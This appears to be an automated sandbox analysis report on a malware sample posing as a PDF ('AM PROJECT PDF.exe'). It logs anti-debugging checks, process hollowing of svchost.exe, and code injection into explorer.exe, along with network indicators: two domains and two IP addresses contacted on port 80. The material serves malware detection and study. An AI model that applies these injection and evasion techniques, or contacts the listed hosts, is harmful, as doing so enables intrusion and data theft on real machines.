Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h] 6_2_01221C06
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123740D mov eax, dword ptr fs:[00000030h] 6_2_0123740D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123740D mov eax, dword ptr fs:[00000030h] 6_2_0123740D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123740D mov eax, dword ptr fs:[00000030h] 6_2_0123740D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119BC2C mov eax, dword ptr fs:[00000030h] 6_2_0119BC2C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FC450 mov eax, dword ptr fs:[00000030h] 6_2_011FC450
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FC450 mov eax, dword ptr fs:[00000030h] 6_2_011FC450
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A44B mov eax, dword ptr fs:[00000030h] 6_2_0119A44B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118746D mov eax, dword ptr fs:[00000030h] 6_2_0118746D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117849B mov eax, dword ptr fs:[00000030h] 6_2_0117849B
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_012214FB mov eax, dword ptr fs:[00000030h] 6_2_012214FB
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6CF0 mov eax, dword ptr fs:[00000030h] 6_2_011E6CF0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6CF0 mov eax, dword ptr fs:[00000030h] 6_2_011E6CF0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E6CF0 mov eax, dword ptr fs:[00000030h] 6_2_011E6CF0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238CD6 mov eax, dword ptr fs:[00000030h] 6_2_01238CD6
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118F716 mov eax, dword ptr fs:[00000030h] 6_2_0118F716
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FFF10 mov eax, dword ptr fs:[00000030h] 6_2_011FFF10
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FFF10 mov eax, dword ptr fs:[00000030h] 6_2_011FFF10
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A70E mov eax, dword ptr fs:[00000030h] 6_2_0119A70E
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A70E mov eax, dword ptr fs:[00000030h] 6_2_0119A70E
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119E730 mov eax, dword ptr fs:[00000030h] 6_2_0119E730
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123070D mov eax, dword ptr fs:[00000030h] 6_2_0123070D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0123070D mov eax, dword ptr fs:[00000030h] 6_2_0123070D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01164F2E mov eax, dword ptr fs:[00000030h] 6_2_01164F2E
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01164F2E mov eax, dword ptr fs:[00000030h] 6_2_01164F2E
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238F6A mov eax, dword ptr fs:[00000030h] 6_2_01238F6A
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117EF40 mov eax, dword ptr fs:[00000030h] 6_2_0117EF40
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117FF60 mov eax, dword ptr fs:[00000030h] 6_2_0117FF60
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01178794 mov eax, dword ptr fs:[00000030h] 6_2_01178794
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7794 mov eax, dword ptr fs:[00000030h] 6_2_011E7794
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7794 mov eax, dword ptr fs:[00000030h] 6_2_011E7794
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E7794 mov eax, dword ptr fs:[00000030h] 6_2_011E7794
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A37F5 mov eax, dword ptr fs:[00000030h] 6_2_011A37F5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A61C mov eax, dword ptr fs:[00000030h] 6_2_0119A61C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0119A61C mov eax, dword ptr fs:[00000030h] 6_2_0119A61C
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116C600 mov eax, dword ptr fs:[00000030h] 6_2_0116C600
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116C600 mov eax, dword ptr fs:[00000030h] 6_2_0116C600
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116C600 mov eax, dword ptr fs:[00000030h] 6_2_0116C600
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01198E00 mov eax, dword ptr fs:[00000030h] 6_2_01198E00
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121FE3F mov eax, dword ptr fs:[00000030h] 6_2_0121FE3F
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01221608 mov eax, dword ptr fs:[00000030h] 6_2_01221608
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0116E620 mov eax, dword ptr fs:[00000030h] 6_2_0116E620
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h] 6_2_01177E41
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122AE44 mov eax, dword ptr fs:[00000030h] 6_2_0122AE44
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0122AE44 mov eax, dword ptr fs:[00000030h] 6_2_0122AE44
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h] 6_2_0118AE73
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0117766D mov eax, dword ptr fs:[00000030h] 6_2_0117766D
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01230EA5 mov eax, dword ptr fs:[00000030h] 6_2_01230EA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01230EA5 mov eax, dword ptr fs:[00000030h] 6_2_01230EA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01230EA5 mov eax, dword ptr fs:[00000030h] 6_2_01230EA5
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011FFE87 mov eax, dword ptr fs:[00000030h] 6_2_011FFE87
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011E46A7 mov eax, dword ptr fs:[00000030h] 6_2_011E46A7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011936CC mov eax, dword ptr fs:[00000030h] 6_2_011936CC
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A8EC7 mov eax, dword ptr fs:[00000030h] 6_2_011A8EC7
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_0121FEC0 mov eax, dword ptr fs:[00000030h] 6_2_0121FEC0
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_01238ED6 mov eax, dword ptr fs:[00000030h] 6_2_01238ED6
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011776E2 mov eax, dword ptr fs:[00000030h] 6_2_011776E2
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011916E0 mov ecx, dword ptr fs:[00000030h] 6_2_011916E0
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Code function: 6_2_011A9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_011A9910
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.fellyhub.com
Source: C:\Windows\explorer.exe Domain query: www.soraligne.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.194.111 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1130000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Memory written: C:\Users\user\Desktop\AM PROJECT PDF.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 3452 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe C:\Users\user\Desktop\AM PROJECT PDF.exe Jump to behavior
Source: explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.370523658.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.305301036.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 0000000D.00000000.336966842.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.319486052.0000000006770000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.370523658.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.305301036.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.369663427.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.303941951.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.397435868.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.370523658.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.305301036.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Users\user\Desktop\AM PROJECT PDF.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
